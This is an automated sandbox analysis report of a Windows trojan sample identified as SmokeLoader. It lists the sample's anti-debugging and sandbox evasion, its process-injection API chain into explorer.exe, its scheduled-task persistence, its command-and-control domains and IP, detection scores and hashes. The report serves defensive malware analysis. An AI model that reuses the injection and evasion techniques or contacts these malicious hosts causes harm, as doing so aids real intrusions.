Source: C:\Windows\explorer.exe TID: 2680	Thread sleep time: -35500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2136	Thread sleep count: 511 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5176	Thread sleep count: 217 > 30	Jump to behavior

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-11653

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 627	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 355	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 511	Jump to behavior

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

Evaded block: after key decision

graph_0-11731

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

System information queried: ModuleInformation

Jump to behavior

Source: explorer.exe, 00000002.00000000.313587656.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 00000002.00000000.313587656.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.343231821.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000002.00000000.313587656.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000002.00000000.312903359.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000002.00000000.266848734.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000002.00000000.312903359.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\P2SMn3jloH.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

Code function: 0_2_00408A87 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00408A87

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

0_2_00417194

Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_021B0042 push dword ptr fs:[00000030h]		0_2_021B0042
Source: C:\Users\user\AppData\Roaming\utisvaa	Code function: 12_2_021A0042 push dword ptr fs:[00000030h]		12_2_021A0042

Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_00407933 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00407933
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_00408A87 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00408A87
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_0040A40B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040A40B
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_00410E4E SetUnhandledExceptionFilter,	0_2_00410E4E
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_00408F5F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00408F5F

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: utisvaa.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: host-file-host6.com
Source: C:\Windows\explorer.exe	Domain query: host-host-file8.com

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Memory written: C:\Users\user\Desktop\P2SMn3jloH.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	Memory written: C:\Users\user\AppData\Roaming\utisvaa base: 400000 value starts with: 4D5A			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

Code function: 0_2_021B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,

0_2_021B0110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Thread created: C:\Windows\explorer.exe EIP: 57B1930			Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	Thread created: unknown EIP: 5851930			Jump to behavior

Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Process created: C:\Users\user\Desktop\P2SMn3jloH.exe C:\Users\user\Desktop\P2SMn3jloH.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	Process created: C:\Users\user\AppData\Roaming\utisvaa C:\Users\user\AppData\Roaming\utisvaa			Jump to behavior

Source: explorer.exe, 00000002.00000000.335292872.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.303168822.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.265409063.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000002.00000000.348886201.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.335292872.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.270117022.0000000006770000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.335292872.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.303168822.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.265409063.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.265126182.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.302408124.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.333974747.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 00000002.00000000.335292872.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.303168822.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.265409063.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	0_2_0041325D
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,	0_2_00418265
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	0_2_00418231
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,	0_2_00412B6A
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_00413374
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: GetLocaleInfoA,	0_2_00411B01
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	0_2_00409B37
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_004183A4
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	0_2_0041340C
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_004124FC
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_00413480
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	0_2_00418541
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	0_2_00412DC2
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_00413652
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: GetLocaleInfoA,	0_2_00418691
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_0041377A
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00413713
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	0_2_00411FE0
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	0_2_004137B6

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

Code function: 0_2_00411388 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00411388

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

0_2_00405224

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.P2SMn3jloH.exe.21b15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.P2SMn3jloH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.utisvaa.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.utisvaa.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.utisvaa.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.utisvaa.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.utisvaa.21a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.P2SMn3jloH.exe.21b15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.P2SMn3jloH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.utisvaa.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.utisvaa.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.utisvaa.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.utisvaa.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.utisvaa.21a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	512 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	3 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	421 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	512 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	112 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	16 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 File Deletion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
P2SMn3jloH.exe	46%	ReversingLabs	Win32.Trojan.Generic
P2SMn3jloH.exe	35%	Virustotal		Browse
P2SMn3jloH.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\utisvaa	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\utisvaa	46%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\utisvaa	35%	Virustotal		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
13.0.utisvaa.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.P2SMn3jloH.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.0.utisvaa.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.0.utisvaa.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.0.utisvaa.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
12.2.utisvaa.21a15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.0.utisvaa.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.0.P2SMn3jloH.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.P2SMn3jloH.exe.21b15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.0.utisvaa.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.0.P2SMn3jloH.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.P2SMn3jloH.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.utisvaa.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.0.utisvaa.400000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
host-file-host6.com	18%	Virustotal		Browse
host-host-file8.com	17%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://host-file-host6.com/	0%	URL Reputation	safe
http://host-host-file8.com/	100%	URL Reputation	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
host-file-host6.com	87.251.79.60	true	true	18%, Virustotal, Browse	unknown
host-host-file8.com	unknown	unknown	true	17%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://host-file-host6.com/	true	URL Reputation: safe	unknown
http://host-host-file8.com/	true	URL Reputation: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
87.251.79.60	host-file-host6.com	Russian Federation		20803	RISS-ASRU	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	736951
Start date and time:	2022-11-03 12:24:08 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	P2SMn3jloH.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/2@4/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 93.8% (good quality ratio 87.2%) Quality average: 75.4% Quality standard deviation: 30.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 25 Number of non-executed functions: 33
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
12:26:08	Task Scheduler	Run new task: Firefox Default Browser Agent 18B1406226926BB9 path: C:\Users\user\AppData\Roaming\utisvaa

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
87.251.79.60	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	fdnKz7IyHm.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	vVmIgdcmAL.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
host-file-host6.com	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	fdnKz7IyHm.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	vVmIgdcmAL.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	JB3fup8PrI.exe	Get hash	malicious	Browse	87.251.79.93
	1ClHTuhdHI.exe	Get hash	malicious	Browse	87.251.79.68
	ar9EPOB64B.exe	Get hash	malicious	Browse	87.251.79.68
	file.exe	Get hash	malicious	Browse	87.251.79.68

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RISS-ASRU	file.exe	Get hash	malicious	Browse	87.251.79.105
	file.exe	Get hash	malicious	Browse	87.251.79.105
	file.exe	Get hash	malicious	Browse	87.251.79.105
	hY48FAymog.exe	Get hash	malicious	Browse	87.251.79.105
	file.exe	Get hash	malicious	Browse	87.251.79.105
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.105
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.105
	file.exe	Get hash	malicious	Browse	87.251.79.60
	file.exe	Get hash	malicious	Browse	87.251.79.105
	file.exe	Get hash	malicious	Browse	87.251.79.105
	file.exe	Get hash	malicious	Browse	87.251.79.105
	file.exe	Get hash	malicious	Browse	87.251.79.105
	file.exe	Get hash	malicious	Browse	87.251.79.60

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\utisvaa

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	215552
Entropy (8bit):	6.969285988131741
Encrypted:	false
SSDEEP:	3072:zmRA4EwqbftQPtRLlTsLxmE6pf5ADM8VGQqf/r4nnFxtHglCFBQx:zmyHbFeRRILgEFI8sfTuxtHMOq
MD5:	0779F7B34E9079944427B8260B49C205
SHA1:	31F2CF1DC970FDFAF51B9AAB2C9E0B9715FB53EC
SHA-256:	5C7FF5F2993BDB60D15A567DFAEF41DCD30875D6629F2775ACDB190E01DCEF87
SHA-512:	E22E6186F82A3EB329874C246A9D64CC45EDE3A6EE93447DCDC3E93CB0C52A40B9CFB36E0350E1CDC1487D47BB94D3478B49376C2DE5C64A82DA545C2C976B3E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46% Antivirus: Virustotal, Detection: 35%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L.^.".^.".^.".@...C.".@.....".y.Y.Y.".^.#...".@...l.".@..._.".@..._.".Rich^.".........PE..L...#H.a..................... ....................@..................................D..........................................P........C..........................................................HC..@............... ............................text...J........................... ..`.data..............................@....rsrc....C.......D..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\utisvaa:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
